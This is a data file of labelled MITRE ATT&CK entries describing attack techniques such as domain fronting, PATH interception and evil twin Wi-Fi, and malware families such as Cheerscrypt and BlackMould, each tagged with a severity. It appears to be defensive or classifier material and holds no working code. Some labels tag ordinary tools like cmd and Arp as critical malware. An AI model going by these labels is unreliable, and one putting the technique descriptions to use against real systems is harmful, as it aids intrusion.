{"id": "mitre_00593", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Domain Fronting\n\nTechnique: T1090.004\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows, ESXi\n\nAdversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1090.004", "technique_name": "Domain Fronting", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00594", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cheerscrypt\n\nType: malware\nPlatforms: Windows, ESXi\n\n[Cheerscrypt](https://attack.mitre.org/software/S1096) is a ransomware that was developed by [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) and has been used in attacks against ESXi and Windows environments since at least 2022. [Cheerscrypt](https://attack.mitre.org/software/S1096) was derived from the leaked [Babuk](https://attack.mitre.org/software/S0638) source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from [Babuk](https://attack.mitre.org/software/S0638).(Citation: Sygnia Emperor Dragonfly October 2022)(Citation: Trend Micro Cheerscrypt May 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Cheerscrypt", "malware_type": "malware"}}]}
{"id": "mitre_00595", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Input Capture\n\nTechnique: T1056\nTactics: collection, credential-access\nPlatforms: Linux, macOS, Network Devices, Windows\n\nAdversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1056", "technique_name": "Input Capture", "tactics": ["collection", "credential-access"]}}]}
{"id": "mitre_00596", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Catchamas\n\nType: malware\nPlatforms: Windows\n\n[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Catchamas", "malware_type": "malware"}}]}
{"id": "mitre_00597", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Server Software Component\n\nTechnique: T1505\nTactics: persistence\nPlatforms: Windows, Linux, macOS, Network Devices, ESXi\n\nAdversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1505", "technique_name": "Server Software Component", "tactics": ["persistence"]}}]}
{"id": "mitre_00598", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Trusted Developer Utilities Proxy Execution\n\nTechnique: T1127\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.\n\nSmart App Control is a feature of Windows that blocks applications it considers potentially malicious from running by verifying unsigned applications against a known safe list from a Microsoft cloud service before executing them.(Citation: Microsoft Smart App Control) However, adversaries may leverage \"reputation hijacking\" to abuse an operating system\u2019s trust of safe, signed applications that support the execution of arbitrary code. By leveraging [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127) to run their malicious code, adversaries may bypass Smart App Control protections.(Citation: Elastic Security Labs)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1127", "technique_name": "Trusted Developer Utilities Proxy Execution", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00599", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Data Compressed\n\nTechnique: T1002\nTactics: exfiltration\nPlatforms: Linux, Windows, macOS\n\nAn adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1002", "technique_name": "Data Compressed", "tactics": ["exfiltration"]}}]}
{"id": "mitre_00600", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Break Process Trees\n\nTechnique: T1036.009\nTactics: defense-evasion\nPlatforms: Linux, macOS\n\nAn adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the \u201cparent-child\" relationship for detection, breaking this relationship could result in the adversary\u2019s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the \u201cdaemon\u201d syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036.009", "technique_name": "Break Process Trees", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00601", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BlackByte Ransomware\n\nType: malware\nPlatforms: Windows\n\n[BlackByte Ransomware](https://attack.mitre.org/software/S1180) is uniquely associated with [BlackByte](https://attack.mitre.org/groups/G1043) operations. [BlackByte Ransomware](https://attack.mitre.org/software/S1180) used a common key for infections, allowing for the creation of a universal decryptor.(Citation: Trustwave BlackByte 2021)(Citation: FBI BlackByte 2022) [BlackByte Ransomware](https://attack.mitre.org/software/S1180) was replaced in [BlackByte](https://attack.mitre.org/groups/G1043) operations by [BlackByte 2.0 Ransomware](https://attack.mitre.org/software/S1181) by 2023.(Citation: Microsoft BlackByte 2023)(Citation: Cisco BlackByte 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BlackByte Ransomware", "malware_type": "malware"}}]}
{"id": "mitre_00602", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# XPC Services\n\nTechnique: T1559.003\nTactics: execution\nPlatforms: macOS\n\nAdversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)\n\nAdversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1559.003", "technique_name": "XPC Services", "tactics": ["execution"]}}]}
{"id": "mitre_00603", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exfiltration Over Alternative Protocol\n\nTechnique: T1048\nTactics: exfiltration\nPlatforms: ESXi, IaaS, Linux, macOS, Network Devices, Office Suite, SaaS, Windows\n\nAdversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1048", "technique_name": "Exfiltration Over Alternative Protocol", "tactics": ["exfiltration"]}}]}
{"id": "mitre_00604", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Modify Cloud Compute Configurations\n\nTechnique: T1578.005\nTactics: defense-evasion\nPlatforms: IaaS\n\nAdversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim\u2019s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.\n\nFor example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim\u2019s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1578.005", "technique_name": "Modify Cloud Compute Configurations", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00605", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Code Signing\n\nTechnique: T1553.002\nTactics: defense-evasion\nPlatforms: macOS, Windows\n\nAdversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1553.002", "technique_name": "Code Signing", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00606", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HAPPYWORK\n\nType: malware\n\n[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HAPPYWORK", "malware_type": "malware"}}]}
{"id": "mitre_00607", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hardware Additions\n\nTechnique: T1200\nTactics: initial-access\nPlatforms: Windows, Linux, macOS\n\nAdversaries may physically introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access points to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1200", "technique_name": "Hardware Additions", "tactics": ["initial-access"]}}]}
{"id": "mitre_00608", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# cmd\n\nType: tool\nPlatforms: Windows\n\n[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)\n\nCmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir (Citation: TechNet Dir)), deleting files (e.g., del (Citation: TechNet Del)), and copying files (e.g., copy (Citation: TechNet Copy)).", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "cmd", "malware_type": "tool"}}]}
{"id": "mitre_00609", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Embedded Payloads\n\nTechnique: T1027.009\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1027.009", "technique_name": "Embedded Payloads", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00610", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Dipsind\n\nType: malware\nPlatforms: Windows\n\n[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Dipsind", "malware_type": "malware"}}]}
{"id": "mitre_00611", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Misdat\n\nType: malware\nPlatforms: Windows\n\n[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Misdat", "malware_type": "malware"}}]}
{"id": "mitre_00612", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# MirageFox\n\nType: malware\nPlatforms: Windows\n\n[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "MirageFox", "malware_type": "malware"}}]}
{"id": "mitre_00613", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Arp\n\nType: tool\nPlatforms: Linux, Windows, macOS\n\n[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Arp", "malware_type": "tool"}}]}
{"id": "mitre_00614", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CALENDAR\n\nType: malware\nPlatforms: Windows\n\n[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CALENDAR", "malware_type": "malware"}}]}
{"id": "mitre_00615", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Evil Twin\n\nTechnique: T1557.004\nTactics: credential-access, collection\nPlatforms: Network Devices\n\nAdversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia \u2018Evil Twin\u2019)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin) Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple \u2013 a network security auditing and penetration testing tool \u2013 may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network.(Citation: specter ops evil twin) Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network.\n\nUpon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim\u2019s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1557.004", "technique_name": "Evil Twin", "tactics": ["credential-access", "collection"]}}]}
{"id": "mitre_00616", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Downgrade System Image\n\nTechnique: T1601.002\nTactics: defense-evasion\nPlatforms: Network Devices\n\nAdversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1601.002", "technique_name": "Downgrade System Image", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00617", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Build Image on Host\n\nTechnique: T1612\nTactics: defense-evasion\nPlatforms: Containers\n\nAdversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1612", "technique_name": "Build Image on Host", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00618", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Path Interception by PATH Environment Variable\n\nTechnique: T1574.007\nTactics: persistence, privilege-escalation, defense-evasion\nPlatforms: Windows, macOS, Linux\n\nAdversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1574.007", "technique_name": "Path Interception by PATH Environment Variable", "tactics": ["persistence", "privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00619", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Rename Legitimate Utilities\n\nTechnique: T1036.003\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation: Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed PSExec) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.(Citation: F-Secure CozyDuke)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036.003", "technique_name": "Rename Legitimate Utilities", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00620", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Search Victim-Owned Websites\n\nTechnique: T1594\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition to manually browsing the website, adversaries may attempt to identify hidden directories or files that could contain additional sensitive information or vulnerable functionality. They may do this through automated activities such as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as well as by leveraging files such as sitemap.xml and robots.txt.(Citation: Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1594", "technique_name": "Search Victim-Owned Websites", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00621", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BlackMould\n\nType: malware\nPlatforms: Windows\n\n[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BlackMould", "malware_type": "malware"}}]}
{"id": "mitre_00622", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Denis\n\nType: malware\nPlatforms: Windows\n\n[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Denis", "malware_type": "malware"}}]}
{"id": "mitre_00623", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Aria-body\n\nType: malware\nPlatforms: Windows\n\n[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since approximately 2017.(Citation: CheckPoint Naikon May 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Aria-body", "malware_type": "malware"}}]}
{"id": "mitre_00624", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exploitation for Credential Access\n\nTechnique: T1212\nTactics: credential-access\nPlatforms: Linux, Windows, macOS, Identity Provider\n\nAdversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0\n\nCredentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)\n\nSuch exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)\n\nExploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], 